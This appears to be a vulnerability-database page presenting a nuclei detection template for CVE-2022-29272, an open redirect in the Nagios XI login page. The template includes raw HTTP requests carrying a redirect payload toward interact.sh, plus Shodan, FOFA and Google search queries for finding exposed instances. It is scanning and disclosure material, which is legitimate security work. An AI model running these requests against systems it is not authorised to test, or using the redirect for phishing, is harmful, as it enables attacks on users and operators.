Lucene search
K

Nagios XI <5.8.5 - Open Redirect

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 49 Views

Nagios XI <5.8.5 - Open Redirect, CVE-2022-29272, medium severity, redirecting users to malicious site

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-29272
29 Jun 202201:15
attackerkb
CNNVD
Nagios XI 输入验证错误漏洞
28 Jun 202200:00
cnnvd
CVE
CVE-2022-29272
29 Jun 202200:58
cve
Cvelist
CVE-2022-29272
29 Jun 202200:58
cvelist
EUVD
EUVD-2022-33615
3 Oct 202520:07
euvd
NVD
CVE-2022-29272
29 Jun 202201:15
nvd
Prion
Open redirect
29 Jun 202201:15
prion
RedhatCVE
CVE-2022-29272
22 May 202522:08
redhatcve
id: CVE-2022-29272

info:
  name: Nagios XI <5.8.5 - Open Redirect
  author: ritikchaddha
  severity: medium
  description: |
    Nagios XI through 5.8.5 contains an open redirect vulnerability in the login function. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks.
  remediation: |
    Upgrade Nagios XI to version 5.8.5 or later to mitigate the vulnerability.
  reference:
    - https://github.com/sT0wn-nl/CVEs/tree/master/CVE-2022-29272
    - https://github.com/4LPH4-NL/CVEs
    - https://github.com/sT0wn-nl/CVEs/blob/master/README.md#nagios-xi
    - https://nvd.nist.gov/vuln/detail/CVE-2022-29272
    - https://assets.nagios.com/downloads/nagiosxi/CHANGES-5.TXT
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-29272
    cwe-id: CWE-601
    epss-score: 0.03862
    epss-percentile: 0.88903
    cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: nagios
    product: nagios_xi
    shodan-query: http.title:"nagios xi"
    fofa-query:
      - title="nagios xi"
      - app="nagios-xi"
    google-query: intitle:"nagios xi"
  tags: cve,cve2022,redirect,nagios,nagiosxi,vuln

http:
  - raw:
      - |
        GET /nagiosxi/login.php?redirect=/www.interact.sh HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /nagiosxi/login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        nsp={{nsp_token}}&page=auth&debug=&pageopt=login&redirect=%2Fwww.interact.sh&username={{username}}&password={{password}}&loginButton=Login

    host-redirects: true
    max-redirects: 2
    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1

    extractors:
      - type: regex
        name: nsp_token
        group: 1
        regex:
          - '<input type="hidden" name="nsp" value="(.*)">'
          - "<input type='hidden' name='nsp' value='(.*)'>"
        internal: true
        part: body
# digest: 490a0046304402206e2f817ae7f927597a22eb10638fbb11de893ee0254c35731cfbf5380e870f9e02207c1dc4f1d90d0ad09277ddb7c7fb60cfdc160a5ee1eac882aa373c17e5f3fde8:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 25.8
CVSS 3.16.1
EPSS0.03862
49